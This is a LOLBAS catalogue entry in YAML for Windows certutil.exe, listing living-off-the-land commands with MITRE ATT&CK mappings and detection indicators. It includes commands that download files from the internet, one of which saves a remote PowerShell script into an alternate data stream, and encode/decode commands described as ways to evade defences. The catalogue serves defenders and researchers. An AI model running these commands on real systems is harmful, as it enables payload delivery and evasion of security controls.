LOLBAS/certutil.yml.txt

76 lines
3.3 KiB
Plaintext
Raw Normal View History

2020-10-14 20:10:19 +02:00
---
Name: Certutil.exe
Description: Windows binary used for handeling certificates
Author: 'Oddvar Moe'
Created: '2018-05-25'
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/techniques/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe
Code_Sample:
- Code:546573745f62795f4c696f72(example of the encoded hexadecimal file)
Detection:
- IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent
Resources:
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- Link: https://twitter.com/mattifestation/status/620107926288515072
- Link: https://twitter.com/egre55/status/1087685529016193025
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Moriarty
Handle: '@Moriarty_Meng'
- Person: egre55
Handle: '@egre55'
- Person: Lior Adar
---